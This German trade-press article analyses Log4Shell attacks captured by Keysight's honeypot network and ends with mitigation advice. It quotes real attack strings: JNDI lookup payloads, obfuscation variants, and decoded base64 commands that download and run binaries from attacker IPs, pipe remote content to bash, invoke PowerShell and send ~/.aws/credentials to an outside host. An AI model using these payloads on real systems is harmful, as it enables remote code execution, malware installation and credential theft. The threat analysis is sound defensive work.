:quality(80)/p7i.vogel.de/wcms/9c/bb/9cbb5825efdfea727b826d3f0463dd9b/0108252158.jpeg "Mitarbeiter geraten heute schnell ins Visier von Cyberkriminellen. Nur durch Security Awareness Trainings können sie diese Tricks rechtzeitig erkennen. (Bild: Funtap - stock.adobe.com)")
:quality(80)/p7i.vogel.de/wcms/01/d9/01d96a53f8d2a111e5a98976be1cfff3/0108278988.jpeg "Wir kommen in Zukunft zwar vielleicht ohne Passwörter aus, aber Access-Management-Lösungen zur Authentifizierung und Autorisierung der Benutzer werden weiterhin dringend gebraucht. (Bild: adam121 - stock.adobe.com)")
:quality(80)/p7i.vogel.de/wcms/e9/34/e93444cbcc0f518c1bc0a005dc36147c/0108250229.jpeg "Enterprise Network Firewalls schützen das Unternehmensnetz vor einer Vielzahl möglicher Attacken. Von klassischen DDoS-Angriffen über Trojaner und Malware in verschlüsselten Datenübertragungen, bis hin zu Advanced Persistent Threats. (Bild: valerybrozhinsky - stock.adobe.com)")
:quality(80)/p7i.vogel.de/wcms/ad/0d/ad0d263e64f9b554d2729072a61ba429/0110347950.jpeg "Angreifer nutzen Fehlkonfigurationen, schwache Kennwörter, Fehler und andere Schwachstellen aus, um ihnen den Zugriff auf geschützte Assets zu ermöglichen. (Bild: NicoElNino - stock.adobe.com)")
:quality(80)/p7i.vogel.de/wcms/f6/4e/f64e844d9677a0ce82d3d48b1008e10c/0110331365.jpeg "Microsoft bringt zum Patchday im März 2023 74 Updates. Sechs der Schwachstellen sind als kritisch eingestuft! Besonders betroffen sind Windows und Office, mit existierenden Exploits und öffentlich bekannten Lücken. (Logo:Microsoft)")
:quality(80)/p7i.vogel.de/wcms/d7/a7/d7a74fc125765e3aaa4a1cd46952f036/0109587894.jpeg "Checkmarx Supply Chain Threat Intelligence kombiniert Threat Intelligence mit Machine Learning, Retro Hunting und Cross-Language Hunting. (Bild: Checkmarx)")
:quality(80)/p7i.vogel.de/wcms/d6/32/d63226d47fb28c9e31bd3b019621723f/0110317549.jpeg "Mit dem Aufkommen des vernetzten Internet of Medical Things (IoMT) nehmen auch Cyberbedrohungen zu (© MQ-Illustrations - stock.adobe.com)")
:quality(80)/p7i.vogel.de/wcms/0f/99/0f998fe4c793c2a3004a18956f25511c/0110347017.jpeg "„Eine KI ist in erster Linie ein Werkzeug, welches weder „gut“ noch „böse“ ist. Gut oder böse wird ein Werkzeug erst durch seine Anwender und den Zweck, zu dem sie es einsetzen.“, sagt Tim Berghoff, Security Evangelist bei G DATA CyberDefense. (Bild: Supatman - stock.adobe.com)")
:quality(80)/p7i.vogel.de/wcms/83/cb/83cbc8b48e4cbb70cf7ec5bd5880d9cc/0110309438.jpeg "Mit einem Zero-Trust-Konzept, einem intensiven Monitoring aller Datenströme und einer Single Sign-On (SSO)-Authentifizierungsmethode lassen sich die neuen Anforderungen der Arbeitswelt mit denen der IT-Security in Einklang bringen. (Bild: peshkov - stock.adobe.com)")
:quality(80)/p7i.vogel.de/wcms/4c/b9/4cb9d66fafd8d20bf909bfd236e254b6/0110382436.jpeg "Zwar existiert heute noch kein Quantencomputer, der aktuelle Verschlüsselungsmethoden knacken kann, aber Unternehmen sollten dennoch schon heute entsprechende Vorbereitungen für den Tag treffen, wenn der Fall eintritt. (Bild: Siarhei - stock.adobe.com)")
:quality(80)/p7i.vogel.de/wcms/7e/67/7e67a44843941beee4d1a47ad333a80b/0109769083.jpeg "Im Projekt entwickeln die Forscher Technologien zur drahtlosen Quantenkommunikation zwischen mehreren Geräten innerhalb eines Raumes. (Bild: © – metamorworks – stock.adobe.com)")
:quality(80)/p7i.vogel.de/wcms/4c/cc/4cccb0da2d73a5ae0728d58e59140aaf/0110379345.jpeg "Native Cloud-Technologien ermöglichen es Unternehmen, die Flexibilität zu nutzen, die erforderlich ist, um in der aktuellen Wettbewerbslandschaft mithalten und neue Geschäftsmodelle entwickeln zu können. (Bild: kanpisut - stock.adobe.com)")
:quality(80)/p7i.vogel.de/wcms/5c/9e/5c9ee5f6c2154429c4adebfebd62c98b/0110293361.jpeg "Um Angriffe auf die Software-Supply-Chain und Cloud-Native-Infrastrukturen zu verhindern, brauchen Unternehmen den richtigen Sicherheitsansatz, basierend auf Best-Practice-Methoden. (Bild: thodonal - stock.adobe.com)")
:quality(80)/p7i.vogel.de/wcms/b1/68/b168e398bcf5fb44337e5a40214e5f56/0109580616.jpeg "Eine API ist eine Schnittstelle zum strukturierten Austausch von Befehlen und Informationen zwischen Programmen oder Programmteilen, mit vorgegebener Syntax. (Bild: gemeinfrei)")
:quality(80)/p7i.vogel.de/wcms/94/29/942929c3785964880e17ce7285b47044/0109553991.jpeg "Auch wenn der Quellcode für die ganze Welt offen ist, ist Open-Source-Code nicht frei von Nutzungsbeschränkungen. (Bild: © – cacaroot – stock.adobe.com)")
:quality(80)/p7i.vogel.de/wcms/8b/e0/8be0b0e53654d7be413a4b4759cdc68d/0110330903.jpeg "Multi-Faktor-Authentifizierung trägt definitiv zur Sicherheit in Unternehmen bei und erschwert Phishing-Angriffe. Aber nur wenn auch die MFA-Lösung selbst Phishing-sicher ist, bietet sie nachhaltig Sicherheit. (Bild: Anya - stock.adobe.com)")
:quality(80)/p7i.vogel.de/wcms/cf/fc/cffcdb017034d5478cacf1bcb30a7665/0109349789.jpeg "Um die Sicherheit von Daten und Systemen zu erhöhen und das Risiko von Angriffen oder Datenverlust zu reduzieren sollten Berechtigungen auf das absolut notwendige Minimum beschränkt werden. (Bild: frei lizenziert Fernando Arcos - Pixabay)")
:quality(80)/p7i.vogel.de/wcms/2a/52/2a5232e8e490e419cef61ed451773e7d/0110347855.jpeg "Der Cyber Resilience Act führt Regeln zum Schutz digitaler Produkte ein, die von keinen früheren Regelungen erfasst wurden. Security-by-Design wird dabei zum neuen Standard und erweitert somit auch das Verständnis von kritischer Infrastruktur. (Bild: artjazz - stock.adobe.com)")
:quality(80)/p7i.vogel.de/wcms/26/49/26492b67229c580696cf2eaa9995ddc3/0110317608.jpeg "Eine umfassende IT-Abwehr können KMU aufgrund geringer Personalressourcen oft nicht leisten. (Bild: Gunnar Assmy - stock.adobe.com)")
:quality(80)/p7i.vogel.de/wcms/08/48/084856af2569f600d6a8ddc908e286b4/0110345761.jpeg "„Unternehmen, die in ihre Mitarbeiter investieren, haben immer die Nase vorn, besonders in schwierigen Zeiten.“ sagt Erik Gaston, VP Global Executive Engagement bei Tanium. (Bild: WrightStudio - stock.adobe.com)")
:quality(80)/p7i.vogel.de/wcms/ac/ec/acec2e8899c63372cfa6416fb2c12cb8/0109580606.jpeg "Microservices sind kleine, unabhängige Dienste für bestimmte Aufgaben einer Anwendung und bilden einen Gegenentwurf zu monolithischen Anwendungen. (Bild: gemeinfrei)")
:quality(80)/p7i.vogel.de/wcms/67/31/673143fd658b9c7cf226919bfd404398/0109123296.jpeg "ISA-99 ist ein in der Normenreihe IEC 62443 aufgegangener Cybersecurity-Standard für industrielle Automatisierungs- und Steuerungssysteme (IACS). (Bild: gemeinfrei)")
:quality(80)/images.vogel.de/vogelonline/bdb/1804200/1804272/original.jpg "XDR (Extended Detection and Response) erkennt Angriffe auf Endpoints frühzeitig. (Darwin Laganzon)")
:quality(80)/images.vogel.de/vogelonline/bdb/1804200/1804284/original.jpg "Eine wirksame Notfallvorsorge muss auch fortschrittliche Attacken vorhersehen. (Tumisu)")
:quality(80)/images.vogel.de/vogelonline/bdb/1801500/1801554/original.jpg "Der Schutz von Operational Technology erfordert spezielle Security-Maßnahmen. (Gerd Altmann)")
:quality(80)/images.vogel.de/vogelonline/bdb/1801500/1801534/original.jpg "Security-by-Design ist bei Cloud-Apps besonders wichtig. (Werner Moser)")
Kurz- und langfristiger Schutz vor Log4j-Schwachstelle Analyse von Log4Shell-Angriffen
Anbieter zum Thema
:fill(fff,0)/images.vogel.de/vogelonline/companyimg/107800/107800/65.jpg "SonicWall_Registered-2C.JPG ()")
:fill(fff,0)/p7i.vogel.de/companies/60/87/6087fe6e823c7/arvatosystems-logo-600x600.jpg "ArvatoSystems-Logo_600x600.jpg (Arvato Systems)"){kind=logo}
:fill(fff,0)/p7i.vogel.de/companies/60/a2/60a27b8f295c3/txone-logos-rgb-rgb.png "txone-logos-rgb-rgb (TXOne Networks)")
Ende des letzten Jahrs kam es zu den ersten Log4Shell-Angriffen. Die Experten des Keysight ATI Research Center haben die Angriffe auf die Log4j-Schwachstelle unter die Lupe genommen und genau analysiert. Hier beschreiben sie, was sie herausgefunden haben.
Keysight betreibt ein globales Honeypot-Netzwerk, um unter der Leitung unseres ATI Research Center (Application and Threat Intelligence) Trends bei bösartigen Aktivitäten im Internet zu verfolgen. Die ersten Log4Shell-Aktivitäten wurden am Freitag, dem 10. Dezember, gegen 6:00 Uhr UTC beobachtet. Seitdem analysieren wir die Aktivitäten, um die von Angreifern verwendeten Taktiken, Techniken und Verfahren (Tactics, Techniques, and Procedures, TTPs) besser zu verstehen und unsere Kunden zu schützen.
Der Log4Shell-Angriff wird in zwei Hauptphasen durchgeführt, an denen mehrere Hosts beteiligt sind. Im ersten Schritt wird eine Verbindung zu einem Webserver hergestellt, und über die HTTP-Verbindung wird eine Zeichenfolge gesendet, die geloggt wird. Diese Zeichenfolge löst eine Schwachstelle im Log4j-Java-Logging-Code aus, die den Opfer-Webserver dazu veranlasst, eine Binärdatei von einem zweiten Server herunterzuladen, die dann auf dem Opfer-Webserver mit den Rechten der Webanwendung ausgeführt wird. Nachdem die bösartige Binärdatei auf dem Opfersystem ausgeführt wurde, sind den Möglichkeiten im Grunde keine Grenzen gesetzt – zusätzliche Software kann heruntergeladen und ausgeführt werden, sie kann sich lateral bewegen, usw. Diese Ergebnisse sind je nach Malware-Kampagne sehr unterschiedlich und liegen außerhalb des Rahmens unserer Untersuchung.
Funktionsweise
Als erstes untersuchten wir die Verbindungen der ersten Stufe – die anfänglichen HTTP-Verbindungen. Diese kamen aus der ganzen Welt und wurden mit ziemlicher Sicherheit von Botnets gesendet; die geografische Verteilung der angreifenden IPs entsprach genau der geografischen Verteilung der Botnets. Brasilien, Russland und China spielten eine zentrale Rolle. Diese Phase des Angriffs ist sehr einfach und kann leicht von arglosen Laptops, IoT-Geräten und dergleichen gestartet werden.
In der nächsten Phase unserer Analyse untersuchten wir die Befehle, die die Angreifer ursprünglich gesendet hatten. JNDI (Java Naming and Directory Interface) ist eine Java-Funktion, mit der Objekte während der Laufzeit geladen und verwendet werden können. Der Log4j/Log4Shell-Angriff nutzt diese Funktion aus, indem er eine Log-Nachricht sendet, die einen Befehl zum Herunterladen von Malware enthält, in den meisten Fällen über LDAP. Die Zeichenfolge, die geloggt wird, sieht etwa so aus:
${ jndi:ldap:evilserver/path/malware }Diese Log-Nachricht veranlasst JNDI, eine Verbindung zu evilserver herzustellen und /path/malware herunterzuladen, es als LDAP-Objekt zu interpretieren und auszuführen. Es wurden auch schon Downloads über andere Mechanismen, wie z. B. RMI (Java Remote Method Invocation), durchgeführt, aber LDAP ist bei weitem die häufigste Methode.
| ldap:// | 4492 | 97 Prozent |
| ldaps:// | 57 | 1,2 Prozent |
| rmi:// | 33 | 0,71 Prozent |
| http:// | 4 | 0,08 Prozent |
Das erste, was hier auffiel, war die geografische Verteilung der Malware-Server. Russland war mit zwei der drei wichtigsten Server ein Hauptherkunftsland. Danach folgt noch eine längere Liste mit Deutschland, USA und anderen Ländern. Bemerkenswert ist, dass sich der Server mit der Nummer 1 in dieser Stichprobe in Singapur befand, aber einem Unternehmen mit Sitz in Zypern gehörte. Praktischerweise wurden 60 Prozent der Top-Sites bereits in der Rap-Sheet-Datenbank von Keysight erfasst, da wir in letzter Zeit andere bösartige Aktivitäten von diesen Sites beobachtet hatten; sie waren in anderen Malware-Kampagnen verwendet worden. Das bedeutet auch, dass Kunden, die das Keysight-Produkt ThreatARMOR verwenden, automatisch vor diesen Websites geschützt sind, da wir die Verbindungen zu diesen Download-Servern in unserer Datenbank blockieren.
| Anteil | IP | Land |
|---|---|---|
| 35 Prozent | 45.130.229.168 | Singapore |
| 19 Prozent | 45.144.205.233 | Russia |
| 11 Prozent | 195.54.160.149 | Russia |
| 8 Prozent | 205.185.115.217 | US |
| 8 Prozent | 81.30.157.43 | Germany |
| 5 Prozent | 185.250.148.157 | Moldova |
| 4 Prozent | 185.244.158.212 | Ukraine |
| 2 Prozent | 167.172.44.255 | US |
| 2 Prozent | 45.137.21.9 | Bangladesh |
| 2 Prozent | 178.79.157.186 | UK |
| 1 Prozent | 89.163.144.156 | Germany |
| 1 Prozent | 163.172.157.143 | France |
Als Nächstes haben wir uns die tatsächlich gesendeten JNDI-Strings angesehen. Die Angreifer betreiben einen beträchtlichen Aufwand, um die Zeichenfolge zu verschleiern und so die Erkennung durch Perimeter-Sicherheitsvorrichtungen zu umgehen. Dies wurde in erster Linie durch die Manipulation der Groß-/Kleinschreibung von „jndi“ erreicht, wobei die Häufigkeit der Treffer in der nachstehenden Tabelle angegeben ist:
| jndi: | 5.496 | 78 Prozent |
| {jndi:${lower: | 785 | 11,25 Prozent |
| ${${::-j}${::-n}${::-d}${::-i}:$ | 450 | 6,4 Prozent |
| ${${lower:j}${upper:n}${lower:d}${upper:i}: | 120 | 1,7 Prozent |
| ${${lower:${lower:jndi}} | 58 | 1 Prozent |
Eine sehr umfassende Beschreibung der Verschleierungstechniken hat Cloudflare in diesem Blog-Beitrag zusammengestellt. Vermutlich werden immer mehr Verschleierungstechniken eingesetzt, um Schutzmechanismen zu umgehen.
Als nächstes haben wir einige der in den LDAP-Download-Befehlen angegebenen Schadprogramme heruntergeladen und analysiert. Als Beispiel nehmen wir den Befehl
${jndi:ldap://45.83.193.150:1389/Exploit}der auf einen zweiten Server (überprüft durch ldapsearch) –137.184.174.180 – verweist, bei dem es sich um einen Wordpress-Server handelt, der von einem ISP (DigitalOcean) gehostet wird. Höchstwahrscheinlich weiß der Eigentümer dieses Servers nichts von dem Exploit, der unter h__p://137.184.174.180:8082/Exploit.class gehostet wird.
Wenn wir auf diese Exploit.class zugreifen und sie mit Hilfe von Strings untersuchen, sehen wir Folgendes:
Dadurch wird unser Opferserver angewiesen, noch einen weiteren Abruf durchzuführen nach h__p://60.183.165.105/.l/log der eine Reihe von „ptyX“-Dateien enthält (es handelt sich um ELF-Binärdateien):
Interessanterweise enthalten die ptyX-Binärdateien einige japanische Wörter:
Das heißt übersetzt: Ich weiß nichts, nur was du weißt. Dieser Satz taucht häufig in Code auf, der aus der Mirai-Codebasis für Linux- und IOT-Botnets stammt, und ist eine Anspielung auf japanische Anime.
Der letzte Payload (h__p://159.89.182.117/wp-content/themes/twentyseventeen/ldm) ist ein Bash-Skript mit mehreren Verweisen auf TOR.
Base64-Kodierung wurde in großem Umfang als einfache Verschleierungstechnik verwendet, gefolgt von verschiedenen fragwürdigen Befehlen. Schauen wir uns einige konkrete Beispiele an.
1. Download und Ausführung von Binärdateien.
Wir beobachteten, dass Befehle an Log4j gesendet wurden, die etwa so aussahen:
ldap://X.X.X.X/Basic/Command/Base64/Y3VybCBodHRwOi8vMTU5Ljg5LjQuMzkvaW5jbHVkZS9weWZwam4wLng4NiAtTyAvdG1wL3g4NjsgY2htb2QgNzc3IC90bXAveDg2OyAuL3RtcC94ODYgYXBhY2hlLmV4cGxvaXQueDg2Nach der Dekodierung der Base64-Nutzdaten finden wir
curl http://159.89.4.39/include/pyfpjn0.x86 -O /tmp/x86; chmod 777 /tmp/x86; ./tmp/x86 apache.exploit.x86Wir konnten diesen speziellen Code nicht herunterladen, da der Server möglicherweise offline genommen wurde. Aber es ist leicht zu erkennen, wie der Exploit vorging: Er lud offensiven Code in das Verzeichnis /tmp/x86 herunter, den er dann ausführbar machte und ausführte.
2. Diebstahl von AWS-Zugangsdaten
Hinweis: In einigen Beispielen wie diesem entfernen oder verschleiern wir einige Hosts oder Domänen, die an einer Angriffskette beteiligt waren, von denen wir aber annehmen, dass sie unwissentliche Opfer waren.
{jndi:ldap://X.X.X.X/Basic/Command/Base64/Y3VybCAtZCAiJChjYXQgfi8uYXdzL2NyZWRlbnRpYWxzKSIgaHR0cHM6Ly9jNnRkNW1lMnZ0YzAwMDBhcTY5MGdkcGcxNGV5eXl5eWIuaW50ZXJhY3RzaC5jb20%3D%7D}Die base64-Nutzdaten werden dekodiert als
curl -d "$(cat ~/.aws/credentials)" https://REDACTED.interactsh.com3. Sleep-Befehl
Vermutlich hat hier jemand ein Skript getestet, indem er etwas Unschädliches ausgeführt hat. Die an Log4j gesendete Zeichenfolge war:
{jndi:ldap://X.X.X.X/Basic/Command/Base64/c2xlZXAgMjA=}Das bedeutet übersetzt so viel wie "Sleep 20". Wenn man schon von einem Log4Shell-Angriff betroffen sein muss, wäre dies die beste Möglichkeit.
4. Download und Ausführung von Binärdateien.
{jndi:ldap://X.X.X.X/Basic/CommandBase64/ KGN1cmwgLXMgWS5ZLlkuWS9YLlguWC5YfHx3Z2V0IC1xIC1PLSBZLlkuWS5ZL1guWC5YLlgpfGJhc2g= (redacted)}Diese Base64-Nutzdaten werden in eine relativ einfache Befehlssequenz übersetzt, die den heruntergeladenen Inhalt in eine Bash-Shell leitet:
(curl -s Y.Y.Y.Y/$TARGET_IP||wget -q -O- Y.Y.Y.Y/$TARGET_IP)|bash5. Download und Ausführung von Binärdateien
Wir haben die folgende Zeichenfolge beobachtet:
${jndi:ldap://X.X.X.X/Basic/Command/Base64/d2dldCBodHRwOi8vMTU1Ljk0LjE1NC4xNzAvYWFhO2N1cmwgLU8gaHR0cDovLzE1NS45NC4xNTQuMTcwL2FhYTtjaG1vZCA3NzcgYWFhOy4vYWFh}Daraus ergibt sich die folgende Base64-Nutzlast, die sich als (Bill)Gates Linux-Malware für DDoS entpuppt.
wget http://155.94.154.170/aaa;curl -O http://155.94.154.170/aaa;chmod 777 aaa;./aaa6. Und was wäre eine Angriffswelle ohne den gelegentlichen Powershell-Aufruf zum Herunterladen und Ausführen von Angriffen auf anfällige Windows-Systeme?
{jndi:ldap://167.86.70.252:1389/Basic/Command/Base64/Y21kLmV4ZSAvYyBwb3dlcnNoZWxsLmV4ZSAtYyBJbnZva2UtV2ViUmVxdWVzdCBodHRwOi8vMTc3LjUyLjQwLjIyOjUwMDAveHBlcnQvYXBwL2xpYi9sb2Nhd2Vic3R5bGUvZGlzdC9qYXZhc2NyaXB0cy9sb2cucGhw}Entschlüsselt bedeutet dies
cmd.exe /c powershell.exe -c Invoke-WebRequest h__p://177.52.40.22:5000/xpert/app/lib/locawebstyle/dist/javascripts/log.phpWir waren nicht in der Lage, dieses PHP herunterzuladen, aber es ist bemerkenswert, dass Nicht-Linux-Systeme gezielt angegriffen werden.
Beobachtungen
Bei den bösartigen Binärdateien, die wir herunterladen konnten, war Cryptojacking wenig überraschend sehr verbreitet. Wir haben viele der üblichen Tricks und Taktiken beobachtet, die Kryptojacker anwenden, um mehr Systemressourcen für das Cryptomining bereitzustellen, z. B. das Abschalten von unkritischen Systemdiensten (und Diensten mit PID > 301) und die gezielte Suche nach konkurrierenden Cryptominern und deren Abschaltung. Es gibt keine Ehre unter Dieben!
Obwohl die Ausnutzung der Log4j-Schwachstelle fast trivial einfach ist, sehen wir ziemlich ausgereifte Malware-Modelle– wie z. B. Proxy-Kompatibilität, Einfügen von SSH-Schlüsseln und Verwendung von Cron-Jobs zur Planung von Befehlen und Netzwerkverbindungen nach der ersten Infektion, um eine Entdeckung zu vermeiden.
Was bedeutet das für die Unternehmens-IT? Die Nutzung von Log4j ist weit verbreitet, es gibt Milliarden von Java-fähigen Systemen. Es ist trivial einfach auszunutzen, und wir sahen eine sofortige und zunehmende Aktivität, sobald der Proof of Concept Code veröffentlicht wurde.
Hier sind die wichtigsten Strategien, um Unternehmen sowohl kurz- als auch langfristig besser zu schützen.
- 1. Aktualisieren Sie Ihre Web Application Firewalls (WAFs) und andere Perimeter-Geräte sofort, um sowohl eingehende als auch ausgehende Log4j-Angriffe zu stoppen; eingehende, um Ihre Server zu schützen, und ausgehende, für den Fall, dass Sie Systeme haben, die unwissentlich zu einem Botnet gehören. Dies kann kurzfristig einen gewissen Schutz bieten, bis Sie in der Lage sind, alle Ihre Systeme zu aktualisieren. Seien Sie sich jedoch bewusst, dass es einen Wettlauf zwischen bösen Akteuren und Sicherheitsanbietern geben wird, um die Verschleierung zu verbessern und zu überwinden, so dass dies wahrscheinlich nur eine teilweise und vorübergehende Lösung ist. Verwenden Sie ein Tool zur Simulation von Sicherheitsverletzungen und Angriffen wie den Threat Simulator von Keysight, um Ihren WAF/NGFW-Schutz vor Log4j-Angriffen zu bewerten.
- 2. Aktualisieren Sie sowohl die externen als auch die internen Systeme, und zwar in dieser Reihenfolge. Jede exponierte IP-Adresse wird derzeit mit Log4Shell-Verbindungsversuchen bombardiert. Sobald ein Angreifer jedoch Fuß gefasst hat, sei es durch einen Log4Shell-Angriff auf einen externen Server oder einen anderen Mechanismus, wird er sich auf interne Systeme stürzen.
- 3. Überprüfen Sie jedes Gerät in Ihrem Netzwerk auf den Aktualisierungsstatus. Das heißt, jeder Server, Drucker und alles andere, das eine eingehende TCP-Verbindung akzeptiert (insbesondere eine Webverbindung) – und wenden Sie sich an den Hersteller, um nach Updates für Log4j zu suchen. Java ist auf Geräten wie Mobiltelefonen, Blu-ray-Playern, Druckern, Netzwerkgeräten und allem anderen weit verbreitet. Wenn Sie ein paar Tage ohne etwas leben können, schalten Sie es aus, bis Sie Informationen von Ihrem Hersteller erhalten.
- 4. Überwachen Sie Ihre Netzwerkaktivitäten. Achten Sie auf unerwartete ausgehende Verbindungen, insbesondere von Geräten, die über das Internet zugänglich sind. Zero-Trust wäre in dieser Situation natürlich ideal, aber wenn Sie keine vollständige Zero-Trust-Implementierung durchführen können, deaktivieren Sie alle ausgehenden Verbindungen von Geräten, die mit dem Internet verbunden und nicht kritisch sind. Selbst wenn Sie ein anfälliges System haben, an das jemand einen bösartigen JNDI-Befehl weiterleiten kann, der Abruf der Malware aber blockiert ist, bietet dies einen gewissen Schutz.
- 5. Ziehen Sie Geoblocking in Betracht, um Ihr Risiko zu minimieren. Wenn Sie über ein Gerät wie eine NGFW oder ein Threat Intelligence Gateway (wie den ThreatARMOR von Keysight) verfügen, das Geoblocking implementieren kann, sollten Sie dies tun. Blockieren Sie sowohl eingehende als auch ausgehende Verbindungen in Länder, die für Ihr Unternehmen nicht von Bedeutung sind. Wenn Sie feststellen, dass Verbindungen blockiert werden, können Sie diese untersuchen und nach und nach auf eine Whitelist setzen, aber jetzt sollten Sie das Risiko minimieren.
- 6. Aktualisieren Sie alle Ihre Server auf Log4j 2.15.0. Und zwar alle. Denn wenn Sie nur einen verwundbaren Server haben, wird er gefunden werden.
Über den Autor: Scott Register hat mehr als 15 Jahre Erfahrung in der Leitung von Produktmanagement-Aktivitäten für globale Technologieunternehmen und ist derzeit Vice President des Bereichs Security Solutions bei Keysight. Er hat einen B.S.- und einen M.S.-Abschluss in Informatik vom Georgia Institute of Technology und war auch Mitglied einer Forschungsabteilung des Instituts.
(ID:47978032)
:quality(80)/images.vogel.de/vogelonline/bdb/1918600/1918641/original.jpg "Der ITK-Channel eilt zur Hilfe, um die Auswirkungen der Log4j-Schwachstellen zu begrenzen. (VanHope_AdobeStock.jpeg)")
:quality(80)/images.vogel.de/vogelonline/bdb/1933900/1933980/original.jpg "Logikfehler in der BlackMatter-Ransomware – und was sich daraus für die Praxis lernen lässt. (James Thew - stock.adobe.com)")